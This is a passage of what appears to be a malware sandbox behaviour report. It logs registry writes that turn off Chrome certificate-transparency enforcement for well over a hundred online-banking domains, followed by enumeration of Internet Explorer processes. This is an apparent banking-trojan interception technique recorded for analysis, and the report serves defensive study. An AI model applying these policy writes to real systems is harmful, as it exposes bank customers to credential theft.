| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 129, data = www2.popularbancaprivada.es, size = 27, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 130, data = conecta.es.rbcis.com, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 131, data = nbnet.novobanco.es, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 132, data = newentreprises.interepargne.natixis.com, size = 39, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 133, data = cib.natixis.com, size = 15, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 134, data = epargnants.interepargne.natixis.fr, size = 34, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 135, data = bancaelectronica.evobanco.com, size = 29, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 136, data = be.abanca.com, size = 13, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 137, data = mylo.lombardodier.com, size = 21, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 138, data = cs1.credistar.com, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 139, data = www.eurocredito.es, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 140, data = eurocredito.es, size = 14, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 141, data = entreprises.retraite.assurances.natixis.com, size = 43, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 142, data = caixadirecta.colonya.es, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 143, data = bancaporinternet.bancocaixageral.es, size = 35, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 144, data = barclaysnet.barclays.es, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 145, data = www.bsfincomonline.com, size = 22, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 146, data = bsfincomonline.com, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 147, data = bsi.ar-ent.net, size = 14, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 148, data = www.carife.it, size = 13, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 149, data = carife.it, size = 9, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 150, data = www.bancacrasti.it, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 151, data = bancacrasti.it, size = 14, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 152, data = www.biverbanca.it, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 153, data = biverbanca.it, size = 13, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 154, data = app.secservizi.it, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 155, data = bebank.bpel.net, size = 15, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 156, data = ibbweb.tecmarket.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 157, data = tesoreriaonline.bper.it, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 158, data = youwebcard.bancopopolare.it, size = 27, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 159, data = bywebcard.bancopopolare.it, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 160, data = www.bpmbanking.it, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 161, data = bpmbanking.it, size = 13, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 162, data = telemacoweb.credem.it, size = 21, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 163, data = webteso.ubibanca.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 164, data = areariservata.bancamarche.it, size = 28, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 165, data = compasspay.compass.it, size = 21, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 166, data = secure.bancaifis.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 167, data = www.suedtirolbank.eu, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 168, data = suedtirolbank.eu, size = 16, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 169, data = www.albertinisyzbank.it, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 170, data = albertinisyzbank.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 171, data = www.collegiosindacale.bcc.it, size = 28, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 172, data = collegiosindacale.bcc.it, size = 24, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 173, data = rob.raiffeisen.it, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 174, data = onlinebanking.carrefourbanca.it, size = 31, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 175, data = portale.tercas.it, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 176, data = www.fondazionecarispezia.it, size = 27, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 177, data = fondazionecarispezia.it, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 178, data = statements.eabplc.com, size = 21, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 179, data = edrsgrspa.edmond-de-rothschild.it, size = 33, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 180, data = dbonline.deutsche-bank.it, size = 25, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 181, data = ib.raikaritten.it, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 182, data = investors.fonspa.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 183, data = www.fcabank.it, size = 14, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 184, data = fcabank.it, size = 10, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 185, data = internetbanking.venetobanca.it, size = 30, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 186, data = www.agenziabpb.it, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 187, data = agenziabpb.it, size = 13, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 188, data = servizionline.bcp.it, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 189, data = valido.bancaeuro.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 190, data = saas.racomputer.it, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 191, data = login.binck.it, size = 14, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 192, data = www.bmedonline.it, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 193, data = bmedonline.it, size = 13, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 194, data = ib.bancapassadore.it, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 195, data = www2.civibank.com, size = 17, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 196, data = hb.bancareale.it, size = 16, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 197, data = www.chebanca.it, size = 15, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 198, data = chebanca.it, size = 11, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 199, data = ibk.icbpi.it, size = 12, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 200, data = contact.ubp.com, size = 15, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 201, data = services2.pbgate.net, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 202, data = www.gruppocarige.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 203, data = gruppocarige.it, size = 15, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 204, data = www.e-attijari.net, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 205, data = e-attijari.net, size = 14, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 206, data = servizi.bancaitb.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 207, data = myfinance-bpf.mpsa.com, size = 22, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 208, data = www.tesoreria.dedagroup.it, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 209, data = tesoreria.dedagroup.it, size = 22, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 210, data = www.tesoreria.cassacentrale.it, size = 30, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 211, data = tesoreria.cassacentrale.it, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 212, data = carigeonline.gruppocarige.it, size = 28, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 213, data = tesoreria.cabel.it, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 214, data = servizi.bpsinweb.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 215, data = www.bpiexpressonline.com, size = 24, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 216, data = bpiexpressonline.com, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 217, data = portale.bancacaripe.it, size = 22, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 218, data = myhome.gerental.it, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 219, data = online.crfossano.it, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 220, data = www.caterallenonline.co.uk, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 221, data = caterallenonline.co.uk, size = 22, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 222, data = onlinebusiness.lloydsbank.co.uk, size = 31, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 223, data = ibank.zenith-bank.co.uk, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 224, data = ibank.gtbankuk.com, size = 18, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 225, data = online.bankofcyprus.co.uk, size = 25, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 226, data = banking.ireland-bank.com, size = 24, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 227, data = bankofirelandlifeonline.ie, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 228, data = www.kbinternetbanking.com, size = 25, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 229, data = kbinternetbanking.com, size = 21, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 230, data = ibank.reliancebankltd.com, size = 25, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 231, data = online.duncanlawrie.com, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 232, data = esavings.shawbrook.co.uk, size = 24, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 233, data = bureau.bottomline.co.uk, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 234, data = www.bankline.rbs.com, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 235, data = bankline.rbs.com, size = 16, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 236, data = lloydslink.online.lloydsbank.com, size = 32, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 237, data = www.bankline.ulsterbank.ie, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 238, data = bankline.ulsterbank.ie, size = 22, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 239, data = www.business.hsbc.co.uk, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 240, data = business.hsbc.co.uk, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 241, data = banking.bankofscotland.co.uk, size = 28, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 242, data = www.bankline.natwest.com, size = 24, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 243, data = bankline.natwest.com, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 244, data = online-business.bankofscotland.co.uk, size = 36, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 245, data = ebanking2.danskebank.co.uk, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 246, data = northrimbankonline.btbanking.com, size = 32, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 247, data = home2.ybonline.co.uk, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 248, data = www.natwestibanking.com, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 249, data = natwestibanking.com, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 250, data = ibb.firsttrustbank1.co.uk, size = 25, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 251, data = netbanking.ubluk.com, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 252, data = my.sjpbank.co.uk, size = 16, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 253, data = bank.barclays.co.uk, size = 19, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 254, data = alolb1.arbuthnotlatham.co.uk, size = 28, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 255, data = online.hoaresbank.co.uk, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 256, data = butterfieldonline.co.uk, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 257, data = ibusinessbanking.aib.ie, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 258, data = www.internationalpayments.co.uk, size = 31, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 259, data = internationalpayments.co.uk, size = 27, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 260, data = www.asbolb.com, size = 14, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 261, data = asbolb.com, size = 10, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 262, data = personal.co-operativebank.co.uk, size = 31, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 263, data = cbfm.saas.cashfac.com, size = 21, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 264, data = banking.triodos.co.uk, size = 21, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 265, data = ebank.turkishbank.co.uk, size = 23, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls | value_name = 266, data = nebasilicon.fdecs.com, size = 21, type = REG_SZ |
|
1 | |
|
For performance reasons, the remaining 94 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process (13481)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Enumerate Processes | - | - |
|
11791 | |
| Enumerate Processes | - | - |
|
223 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
